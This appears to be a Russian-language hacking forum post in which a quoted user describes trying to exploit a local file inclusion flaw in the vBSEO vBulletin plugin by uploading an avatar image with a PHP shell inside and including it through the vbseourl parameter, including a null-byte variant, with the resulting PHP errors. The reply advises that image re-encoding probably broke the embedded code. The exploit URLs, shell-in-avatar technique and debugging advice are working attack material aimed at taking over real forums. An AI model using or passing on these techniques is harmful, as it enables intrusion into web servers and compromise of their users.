02.06.2012, 09:45
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от Cherep
в vbseo есть LFI, вида:
Код:
vbseo.php?vbseoembedd=1&vbseourl=
Загрузил на форуме аватар(внутри шелл), пытаюсь заинклюдить:
Код:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif
Показывает просто напросто саму картинку
Попробывал с нулл байтом:
Код:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif%00.php
Выдает ошибки:
Код:
Warning: require(38290.gif) [function.require]: failed to open stream: No such file or directory .../public_html/forum/vbseo.php on line 1544
Fatal error: require() [function.require]: Failed opening required '38290.gif' (include_path='.:/usr/local/lib/php') iny .../public_html/forum/vbseo.php on line 1544
Учите матчасть Уважаемый прежде чем задавать подобные вопросы.
Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.
|
|
|